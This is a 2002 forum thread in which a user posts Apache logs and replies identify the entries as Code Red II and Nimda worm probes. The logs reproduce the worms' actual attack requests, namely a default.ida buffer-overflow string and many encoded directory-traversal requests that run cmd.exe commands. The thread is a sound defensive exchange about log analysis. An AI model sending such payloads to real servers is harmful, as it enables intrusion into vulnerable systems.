is this normal or should i do something about it?


anybody konw what this is?


[Mon Feb 11 01:26:34 2002] [error] [client 61.180.183.126] Client sent malformed Host header
[Mon Feb 11 02:56:42 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/root.exe
[Mon Feb 11 02:56:55 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/MSADC/root.exe
[Mon Feb 11 02:57:01 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Mon Feb 11 02:57:08 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Mon Feb 11 02:57:15 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Mon Feb 11 02:57:22 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Mon Feb 11 02:57:29 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Mon Feb 11 02:57:36 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
[Mon Feb 11 02:57:42 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..Á../winnt/system32/cmd.exe
[Mon Feb 11 02:57:55 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..À¯../winnt/system32/cmd.exe
[Mon Feb 11 02:58:02 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..Áœ../winnt/system32/cmd.exe
[Mon Feb 11 02:58:22 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Mon Feb 11 02:58:28 2002] [error] [client 64.175.36.79] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe


61.180.183.126 - - [11/Feb/2002:01:26:34 -0800] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 400 328 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:56:42 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:56:55 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:01 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:08 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:15 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:22 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:29 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:36 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:42 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:49 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:57:55 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:02 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:08 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:15 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:22 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
64.175.36.79 - - [11/Feb/2002:02:58:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-"
140.137.123.1 - - [11/Feb/2002:06:34:43 -0800] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u0 0c3%u0003%u8b00%u531b%u53ff%u0 078%u0000%u00=a HTTP/1.0" 400 328 "-" "-"

That;s Nimba or possibly Code Red trying to gain access. cmd.exe is the Win2k command to bring up a psuedo dos window for further commands. Linux is immune to it so you can safely ignore it. Our main web server at work (RH) gets pinged by Nimba an average of once every 10 seconds.

I think the multiple N's are trying to exploit a big buffer overflow vulnerablity in the base install of Win2k with IIS 5.

[ 16 February 2002: Message edited by: Syngin ]

Yes, the top one is Code Red II. The second is Nimbda. They do hog bandwidth according to the size of your error pages. I posted a couple of links in response to your other post in web serving/security.

http://www.linuxnewbie.org/cgi-bin/ubbcgi/ultimatebb.cgi?ubb=get_topic&f=21&t=002705

Damn old IIS Unicode vulnerabilities :D It can be Nimda , Code Red or a scan... :cool: